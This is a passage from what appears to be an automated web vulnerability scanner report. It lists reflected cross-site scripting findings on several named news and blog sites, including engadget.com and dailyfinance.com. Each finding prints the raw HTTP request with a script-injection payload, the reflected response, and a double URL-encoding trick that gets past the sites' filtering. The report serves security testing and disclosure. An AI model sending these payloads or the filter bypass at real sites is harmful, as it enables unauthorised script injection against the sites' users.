GET /writers/trey-thoelckebdc12"><img%20src%3da%20onerror%3dalert(1)>d2cbddcc6eb/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Trey Thoelckebdc12"><img Src=a Onerror=alert(1)>d2cbddcc6eb" /> ...[SNIP]...
1.525. http://www.dailyfinance.com/writers/trey-thoelcke/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/trey-thoelcke/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b60f7"-alert(1)-"15da3f4608d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/trey-thoelcke/?b60f7"-alert(1)-"15da3f4608d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8831"><img%20src%3da%20onerror%3dalert(1)>2b86e280064 was submitted in the REST URL parameter 2. This input was echoed as f8831"><img src=a onerror=alert(1)>2b86e280064 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/vishesh-kumarf8831"><img%20src%3da%20onerror%3dalert(1)>2b86e280064/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e2a4%2522%253bdbc3b5880ba was submitted in the REST URL parameter 2. This input was echoed as 8e2a4";dbc3b5880ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/vishesh-kumar8e2a4%2522%253bdbc3b5880ba/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.528. http://www.dailyfinance.com/writers/vishesh-kumar/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/vishesh-kumar/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8b0"-alert(1)-"6b18a4cc84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/vishesh-kumar/?5e8b0"-alert(1)-"6b18a4cc84=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.529. http://www.diylife.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.diylife.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa1b"><script>alert(1)</script>b58f3f3dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2aa1b"><script>alert(1)</script>b58f3f3dd35=1 HTTP/1.1 Host: www.diylife.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe916%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e2e3f945f0 was submitted in the REST URL parameter 2. This input was echoed as fe916</script><script>alert(1)</script>1e2e3f945f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/eric-stromerfe916%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e2e3f945f0/ HTTP/1.1 Host: www.diylife.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9b1"><a>fb26dfa8dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/eric-stromerbb9b1"><a>fb26dfa8dbc/ HTTP/1.1 Host: www.diylife.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.diylife.com/category/eric-stromerbb9b1"><a>fb26dfa8dbc/" /> ...[SNIP]...
1.532. http://www.diylife.com/category/eric-stromer/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.diylife.com
Path:
/category/eric-stromer/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc76"><script>alert(1)</script>01ea18791e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/eric-stromer/?8cc76"><script>alert(1)</script>01ea18791e1=1 HTTP/1.1 Host: www.diylife.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.diylife.com/category/eric-stromer/?8cc76"><script>alert(1)</script>01ea18791e1=1" /> ...[SNIP]...
1.533. http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c13"><script>alert(1)</script>c3b351ab889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13"><script>alert(1)</script>c3b351ab889=1 HTTP/1.1 Host: www.electronista.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:18:53 GMT Server: Apache Set-Cookie: PHPSESSID=cr8gnmkqgso7u33b1r7ihqkr51; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 77779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e42f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9716d68035d was submitted in the REST URL parameter 2. This input was echoed as e42f9\"><script>alert(1)</script>9716d68035d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/7+mozarte42f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9716d68035d HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bc37%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7c9a6c534 was submitted in the REST URL parameter 2. This input was echoed as 3bc37<script>alert(1)</script>bd7c9a6c534 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/7+mozart3bc37%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7c9a6c534 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79d52%253cscript%253ealert%25281%2529%253c%252fscript%253eb2672f1bfe6 was submitted in the REST URL parameter 2. This input was echoed as 79d52<script>alert(1)</script>b2672f1bfe6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/FaceTime79d52%253cscript%253ealert%25281%2529%253c%252fscript%253eb2672f1bfe6/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 569f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68d40aa1dc3 was submitted in the REST URL parameter 2. This input was echoed as 569f1\"><script>alert(1)</script>68d40aa1dc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/FaceTime569f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68d40aa1dc3/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c3c1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ef4e263330 was submitted in the REST URL parameter 2. This input was echoed as 3c3c1\"><script>alert(1)</script>2ef4e263330 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Fring3c3c1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ef4e263330/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fcef%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1ce691a6a was submitted in the REST URL parameter 2. This input was echoed as 9fcef<script>alert(1)</script>cb1ce691a6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Fring9fcef%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1ce691a6a/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ff3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01f5ed27f96 was submitted in the REST URL parameter 2. This input was echoed as c5ff3\"><script>alert(1)</script>01f5ed27f96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/GoogleTVc5ff3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01f5ed27f96/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59ef9%253cscript%253ealert%25281%2529%253c%252fscript%253e9f8ff1f0b39 was submitted in the REST URL parameter 2. This input was echoed as 59ef9<script>alert(1)</script>9f8ff1f0b39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/GoogleTV59ef9%253cscript%253ealert%25281%2529%253c%252fscript%253e9f8ff1f0b39/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcec8c83ea4 was submitted in the REST URL parameter 2. This input was echoed as d8096\"><script>alert(1)</script>dcec8c83ea4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/ScreenGrabsd8096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcec8c83ea4/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48cd7%253cscript%253ealert%25281%2529%253c%252fscript%253e9f4b3512041 was submitted in the REST URL parameter 2. This input was echoed as 48cd7<script>alert(1)</script>9f4b3512041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/ScreenGrabs48cd7%253cscript%253ealert%25281%2529%253c%252fscript%253e9f4b3512041/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74867%253cscript%253ealert%25281%2529%253c%252fscript%253e792e0f3d945 was submitted in the REST URL parameter 2. This input was echoed as 74867<script>alert(1)</script>792e0f3d945 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Sonos74867%253cscript%253ealert%25281%2529%253c%252fscript%253e792e0f3d945/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9833e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2bf6fe5582 was submitted in the REST URL parameter 2. This input was echoed as 9833e\"><script>alert(1)</script>e2bf6fe5582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Sonos9833e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2bf6fe5582/ HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eb95037106 was submitted in the REST URL parameter 2. This input was echoed as 61e73\"><script>alert(1)</script>9eb95037106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/askengadget61e73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9eb95037106 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bdbd2%253cscript%253ealert%25281%2529%253c%252fscript%253eeaa78b61619 was submitted in the REST URL parameter 2. This input was echoed as bdbd2<script>alert(1)</script>eaa78b61619 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/askengadgetbdbd2%253cscript%253ealert%25281%2529%253c%252fscript%253eeaa78b61619 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9412c%253cscript%253ealert%25281%2529%253c%252fscript%253e3c7d442946f was submitted in the REST URL parameter 2. This input was echoed as 9412c<script>alert(1)</script>3c7d442946f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
